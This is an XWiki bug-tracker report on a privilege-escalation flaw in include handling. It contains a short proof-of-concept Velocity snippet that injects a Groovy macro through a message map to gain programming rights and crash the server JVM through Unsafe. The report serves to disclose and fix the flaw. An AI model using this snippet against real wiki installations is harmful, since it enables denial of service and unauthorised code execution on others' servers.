Details
-
Bug
-
Resolution: Cannot Reproduce
-
Major
-
None
-
2.4 M1
-
Unknown
-
Description
Tested effective against 2.4-SNAPSHOT.29340
This is pretty easy to exploit and we probably ought to look at changing the behavior of XWiki.include or at least adding a configuration parameter to switch between 'legacy' and 'safe'
{{velocity}}
#if($request.getParameter('segfault'))
#if($xcontext.hasProgrammingRights())
You have PR, segfaulting the machine would be boring.
#else
#set($msg = {'xe.spaces.action.index': '{{groovy}} new Random().unsafe.putAddress(0,0); {{/groovy}}'})
#includeTopic('Main.Spaces')
#end
#end
Do I have programming rights? $xcontext.hasProgrammingRights()
{{/velocity}}
[[Segfault me>>?segfault=me]]
Attachments
Issue Links
- depends on
-
XWIKI-7879 Refactor to confine delegation of programming rights.
-
- In Progress
-